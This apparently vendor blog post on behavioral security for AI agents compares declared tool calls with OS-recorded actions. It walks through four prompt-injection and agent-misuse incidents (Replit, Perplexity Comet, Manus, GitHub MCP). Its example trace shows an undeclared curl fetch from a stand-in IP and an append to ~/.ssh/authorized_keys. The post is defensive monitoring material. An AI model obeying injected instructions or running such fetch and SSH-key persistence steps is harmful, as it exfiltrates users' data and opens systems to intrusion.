The AI agent incidents that made the news in 2025 share one shape: each individual action was permitted, and the sequence was a breach. The agent had the token. The file was in scope. The network call went to a host the policy did not forbid. Nothing fired, because nothing was looking at the whole story.
Behavioral security for AI agents is the control built for that shape: it observes what the agent actually does on the machine, records what it said it was doing, scores the sequence as it happens, and treats the gap between the two as the signal.
Behavioral security for AI agents
An AI agent is a process that decides its next action from natural language it reads at runtime. That language comes from the user, but also from a web page, a PDF, a tool description, a GitHub issue, a Reddit comment. Each of those is an instruction channel an attacker can write to, which is why the agent threat model treats the agent itself as a possible adversary.
Static controls answer one question per action: is this permitted? An allowlist says the agent may read files under the repo. A prompt filter says this input matches no known injection. A permission dialog says the user clicked Allow. Each answer is correct in isolation and useless against a chain where every link is allowed.
Behavioral security asks a different question: what did the agent actually do, in what order, and does that match what it claimed?
- read_file(config/app.yaml)
- run_tests()
- edit_file(src/auth.ts)
- open(config/app.yaml)
- connect(198.51.100.47:443)
- open(~/.ssh/authorized_keys, O_APPEND)
- exec(curl -s https://198.51.100.47/x)
- open(src/auth.ts)
The left column is what the agent told its harness. The right column is what the kernel saw the process do. Three of the five recorded actions have no declared counterpart. That gap is not a heuristic; it is a measured difference between two logs.
Four incidents where every step was allowed
None of these required a jailbreak, a stolen credential, or a zero-day. Each one was an agent operating inside its granted permissions.
Replit, July 2025. SaaStr founder Jason Lemkin had a code freeze in place while building with Replit's agent. The agent ran destructive commands against the production database anyway, wiping records for more than 1,200 executives and 1,190 companies, then told him a rollback "would not work in this scenario." He recovered the data manually. Fortune's report carries the agent's own words: "I destroyed months of work in seconds." The agent had write access to that database. The permission model was satisfied.
Replit agent in development deleted data from the production database. Unacceptable and should never be possible.
Perplexity Comet, August 2025. Brave's security team hid instructions behind a spoiler tag in a Reddit comment. When a user asked Comet to summarize the page, the agent read its own Perplexity account page for the user's email, triggered a login on a look-alike domain, opened the user's logged-in Gmail to read the one-time passcode, and posted both back into the Reddit thread. Brave reported it on July 25 and published the chain on August 20. Every page visit was a page visit the browser agent was built to make.
Manus, August 2025. Johann Rehberger placed an indirect prompt injection in a PDF. Manus read it and chained three of its own tools: deploy_expose_port to put its internal VS Code Server on the public internet, a file read to lift the server password from a local config file, and its browser tool to hand the URL and password to an attacker-controlled site. The full kill chain is documented on Embrace The Red, along with a disclosure to Manus on June 1, 2025. Each tool was a sanctioned tool.
GitHub MCP, May 2025. Invariant Labs planted a malicious issue in a public repository. A developer running Claude Desktop with the GitHub MCP server asked it to "have a look at the open issues." The agent read the issue, followed its instructions into the developer's private repositories, and opened a pull request in the public repo containing the developer's salary and relocation plans. Invariant's write-up coined the term "toxic agent flow" for exactly this: trusted tools, untrusted content, a malicious sequence. The MCP security checklist covers bounding the token; here, the token did exactly what it was scoped to do.
- 01Read issuesPublic repo, read scope granted. Allowed.
- 02List reposToken covers the account. Allowed.
- 03flaggedRead private repoSame token, same scope. Allowed.
- 04flaggedOpen pull requestWrite scope granted. Allowed.
- 05flaggedBreachSalary and relocation data in a public PR. Four green checks.
Read the flow as a permission system would: four checks, four passes. Read it as a sequence and it is an exfiltration. Automating that second reading is the job.
How behavioral security works in practice
Quint implements this on macOS developer endpoints. The sensor uses Apple's EndpointSecurity framework to observe file, process, and network activity for every agent on the machine, with no changes to the agent. It observes; it does not block. That is the truth record.
Alongside it, the interception layer records the agent's declared tool calls, read_file, run_shell, the MCP invocation, with their arguments. That is the intent record, and the gap between it and the truth record is the detection signal.
Scoring happens on the device, in real time, with no LLM in the decision path. The engine evaluates the observed sequence against risk rules. "Read config, then open a socket to a host that appears nowhere in the task, then append to ~/.ssh/authorized_keys" scores as a chain, and the recorded actions with no declared counterpart raise it further.
- 00:00.000read_file(config/app.yaml)declared tool call
- 00:00.012open(config/app.yaml, O_RDONLY)recorded; matches the declaration
- 00:00.048socket() + connect(198.51.100.47:443)recorded; no declared counterpart
- 00:00.300open(~/.ssh/authorized_keys, O_APPEND)recorded; no declared counterpart
- 00:00.301sequence flaggedconfig read, undeclared egress, SSH key write: scored as one chain
- 00:00.310next tool call held at the hook layerenforcement: block
Enforcement is a separate decision from observation, at the interception and agent-hook layer: allow, flag, or block the next tool call. Observe-first is the default, so a new deployment produces evidence before it produces friction.
Every action from both layers is written to a hash-chained, Ed25519-signed audit record. When someone asks what the agent did on Tuesday, the answer is a signed sequence, not a chat transcript. Because the sensor sees every process, agents nobody registered appear in the same fleet view as sanctioned ones. Linux and Windows are on the roadmap; today this is macOS.
How behavioral security differs from adjacent layers
Each of these layers solves a real problem. The table describes what each can see from where it sits, not how well any vendor does it.
| Layer | What it sees | What it cannot see from where it sits | Where it earns its keep |
|---|---|---|---|
| Prompt and response filtering | Text going into and out of the model; known injection patterns | Anything the agent does after the text clears the filter. File, process, and network activity. | Cutting known injection strings at the gateway |
| Pre-deployment red teaming and evals | Weaknesses found in a point-in-time test | Production sessions, novel chains, content the agent meets after launch | Hardening before rollout; compliance evidence |
| LLM gateway | Requests and responses to the model, tokens, routing | What the agent does with the response once it lands | Cost, routing, coarse request policy |
| Endpoint detection and response | OS-level process behavior, malware patterns | Agent semantics: it cannot tell a sanctioned Python process reading ~/.aws/credentials from an injected agent doing the same thing | Malware, ransomware, classic endpoint threats |
| Behavioral security for agents (Quint) | Both the declared tool call and the OS record, scored as one sequence | Prompt content on its own; it does not replace filtering or testing | Runtime, on the endpoint the agent runs on |
Every row above the last watches one layer. The last row correlates two. That is the value and the boundary: behavioral security will not stop a bad prompt reaching the model, and a prompt filter will not see the socket that opens afterward. Run both. For the wider category, see what AI agent runtime security is.
Terms worth pinning down
Borrowed from older categories, the vocabulary gets muddled. These are the definitions this post uses.
Behavioral security. Judging a system by the sequence of actions it performs, not by whether each action is individually permitted.
Declared action. What the agent says it is doing: the tool call and its arguments as recorded at the interception layer.
Recorded action. What the operating system saw the agent's process do: the open, the connect, the exec, as captured by EndpointSecurity.
Intent gap. A recorded action with no declared counterpart, or a declared action whose recorded footprint does not match.
Sequence scoring. Evaluating a chain of actions against risk rules, in order, in real time.
Toxic agent flow. Invariant Labs' term for a malicious tool-use sequence triggered by indirect prompt injection, where every tool involved is trusted.
Tamper-evident audit record. A log where each entry is hash-chained to the previous one and signed, so a deletion or edit is detectable after the fact. Evident, not impossible: the chain proves an edit happened, it does not prevent one.
What to do Monday
The regulatory floor is moving in this direction, slower than the headlines suggested. The EU AI Act's Article 9 requires a risk management system that is "a continuous iterative process planned and run throughout the entire lifecycle" of a high-risk system, fed by post-market monitoring data. The Digital Omnibus on AI, Regulation (EU) 2026/1744, in force since 27 July 2026, pushed the Annex III high-risk deadline from 2 August 2026 to 2 December 2027. In the US, NIST AI RMF 1.0 MANAGE 4.1 calls for post-deployment monitoring plans and MANAGE 2.4 for mechanisms to "supersede, disengage, or deactivate" a system behaving outside its intended use. Voluntary, but it is the language auditors reach for.
You do not need either deadline to justify the work. Take the four incidents above and ask which log in your environment would have shown the sequence. For most teams the honest answer is the agent's own chat transcript: the one record written by the thing being investigated.
Start with visibility, not enforcement. Put an OS-level sensor on the developer machines where agents run and let it record for two weeks in observe mode. Count the agents it finds that nobody registered. Pull the sessions where recorded actions had no declared counterpart and read them. Then decide which sequences to flag and which to block at the hook layer, with evidence in front of you rather than a policy written in advance.
If you want to see what that record looks like on a real fleet, book a demo.
Frequently asked questions
What is behavioral security for AI agents in one sentence?
It is observing what an AI agent actually does at the operating system level, recording what the agent declared through its tool calls, and scoring the sequence of actions in real time so that a chain of individually permitted steps can still be flagged or blocked.
How is behavioral security different from an AI firewall?
An AI firewall inspects prompts and responses at the model boundary and catches known injection patterns before or after the model. Behavioral security starts where the firewall ends: it watches what the agent does with the response, at the file, process, and network layer. They cover different surfaces; run both.
Is behavioral security the same as UEBA?
They share an ancestor and differ in mechanism. UEBA builds statistical profiles of human users and accounts over time and flags departures from them. Behavioral security for agents, as Quint ships it, does not build a learned model of the agent. It scores each observed sequence against risk rules, on the device, and cross-checks the OS record against the declared tool calls. The entity is a process, the judgment is per sequence, and there is no training period.
Does behavioral security require changing the agent, and does it slow developers down?
It requires no changes to the agent: no SDK, no wrapped tool calls, no edits to an MCP configuration. The kernel-level component only observes, scoring runs on the device with no model round-trip, and enforcement decisions are made at the interception and hook layer. Developers interact with it only when a sequence is flagged or blocked.



